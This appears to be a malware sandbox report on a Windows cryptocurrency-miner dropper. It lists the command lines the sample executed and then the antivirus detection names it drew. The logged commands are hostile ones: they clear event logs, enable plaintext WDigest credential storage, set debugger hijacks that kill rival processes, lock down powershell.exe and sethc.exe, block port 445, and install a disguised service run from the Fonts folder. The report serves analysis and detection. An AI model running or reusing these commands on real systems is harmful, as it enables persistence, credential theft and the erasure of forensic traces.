cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\srdsl.exe" /v "debugger" /d taskkill.exe /f
cmd wmic process where "name='svchost.exe' and executablepath='c:\\windows\\svchost.exe'" call terminate
cmd sc start policyagent
cmd taskkill /f /t /im wscript.exe
cmd netsh ipsec static add policy name=aliyun
cmd wevtutil cl "windows powershell"
cmd reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\mshta.exe" /v "debugger" /d taskkill.exe /f
cmd cacls c:\windows\svchost.exe /d everyone
cmd taskkill /f /t /im rundlls.exe
cmd netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
cmd "c:\windows\system32\wscript.exe" "c:\users\test22\appdata\local\temp\tem.vbs"
cmd ping 127.1 -n 5
parent_process iexplore.exe martian_process sc stop MetPipAtcivator
parent_process iexplore.exe martian_process sc delete mssecsvc2.1
parent_process iexplore.exe martian_process sc delete MetPipAtcivator
parent_process iexplore.exe martian_process net user mm123$ /del
parent_process iexplore.exe martian_process net stop mssecsvc2.0
parent_process iexplore.exe martian_process net stop mssecsvc2.1
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
parent_process iexplore.exe martian_process sc stop MicrosotMais
parent_process iexplore.exe martian_process sc delete mssecsvc2.0
parent_process iexplore.exe martian_process sc delete SetPipAtcivator
parent_process iexplore.exe martian_process sc stop SetPipAtcivator
parent_process iexplore.exe martian_process C:\Users\test22\AppData\Local\Temp\tem.vbs
parent_process iexplore.exe martian_process sc stop MicrosotMaims
parent_process iexplore.exe martian_process taskkill /f /t /im dl1hots.exe
parent_process iexplore.exe martian_process cmd /c C:\Windows\TEMP\csonhost.bat
parent_process iexplore.exe martian_process reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
parent_process iexplore.exe martian_process reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process taskkill /f /t /im d1lhots.exe
parent_process iexplore.exe martian_process reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
parent_process iexplore.exe martian_process sc delete MicrosotMais
parent_process iexplore.exe martian_process reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
parent_process iexplore.exe martian_process reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe start MetPipAtcivator
parent_process iexplore.exe martian_process reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
parent_process iexplore.exe martian_process net1 user mm123$ /del
parent_process iexplore.exe martian_process sc delete MicrosotMaims
parent_process iexplore.exe martian_process taskkill /f /t /im rundlls.exe
parent_process iexplore.exe martian_process cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
parent_process iexplore.exe martian_process "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
cmdline cacls C:\Windows\system32\sethc.exe /e /d SERVICE
cmdline wevtutil cl "system"
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\Fonts\csrss.exe /d everyone
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline wevtutil cl "security"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
cmdline cacls C:\Windows\Fonts\sqlservr.exe /d everyone
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\system32\sethc.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\conhost.exe /d everyone
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline cacls C:\Windows\system32\sethc.exe /e /g system:r
cmdline cacls C:\Windows\boy.exe /d everyone
cmdline cacls C:\Windows\lsass.exe /d everyone
cmdline cacls C:\Windows\system32\sethc.exe /g Administrators:f
cmdline cacls C:\Windows\system32\sethc.exe /e /g Users:r
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline wevtutil cl "windows powershell"
cmdline cacls C:\Windows\svchost.exe /d everyone
file C:\Windows\SysWOW64\wscript.exe
Lionic Trojan.Win32.Miner.4!c
tehtris Generic.Malware
MicroWorld-eScan Generic.Dacic.1.BitCoinMiner.A.12CE9F78
FireEye Generic.mg.a3d8b7059f0a4108
McAfee Artemis!A3D8B7059F0A
Cylance Unsafe
Zillya Dropper.FlyStudio.Win32.1
Sangfor Virus.Win32.Save.a
K7AntiVirus Trojan ( 0058f6531 )
Alibaba Trojan:Win32/Coinminer.449
K7GW Trojan ( 0058f6531 )
Cybereason malicious.59f0a4
Arcabit Generic.Dacic.1.BitCoinMiner.A.12CE9F78
BitDefenderTheta Gen:NN.ZexaF.36276.8pKfaC5bmGlb
Cyren W32/ABRisk.ZBIN-2175
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Win32/TrojanDropper.FlyStudio.CO
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Miner.gen
BitDefender Generic.Dacic.1.BitCoinMiner.A.12CE9F78
NANO-Antivirus Trojan.Win32.Miner.jusrbx
Avast FileRepMalware [Misc]
Tencent Risktool.Win64.Bitminer.16000063
Emsisoft Generic.Dacic.1.BitCoinMiner.A.12CE9F78 (B)
F-Secure Heuristic.HEUR/AGEN.1254285
DrWeb Tool.Nssm.2
VIPRE Generic.Dacic.1.BitCoinMiner.A.12CE9F78
TrendMicro TROJ_GEN.R002C0DB523
McAfee-GW-Edition BehavesLike.Win32.Flyagent.wc
Trapmine malicious.high.ml.score
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1254285
Antiy-AVL Trojan/Win32.FlyStudio.a
Gridinsoft Ransom.Win32.Wacatac.sa
Xcitium Packed.Win32.MUPX.Gen@24tbus
Microsoft Trojan:Win32/CoinMiner!MTB
ZoneAlarm not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.gen
GData Win32.Trojan.PSE.10TFD8O
Google Detected
AhnLab-V3 Malware/Win32.Generic.C1805593
VBA32 Trojan.Agentb
ALYac Generic.Dacic.1.BitCoinMiner.A.12CE9F78
MAX malware (ai score=80)
Malwarebytes Trojan.FlyStudio
TrendMicro-HouseCall TROJ_GEN.R002C0DB523
Rising HackTool.NSSM!1.CABB (CLOUD)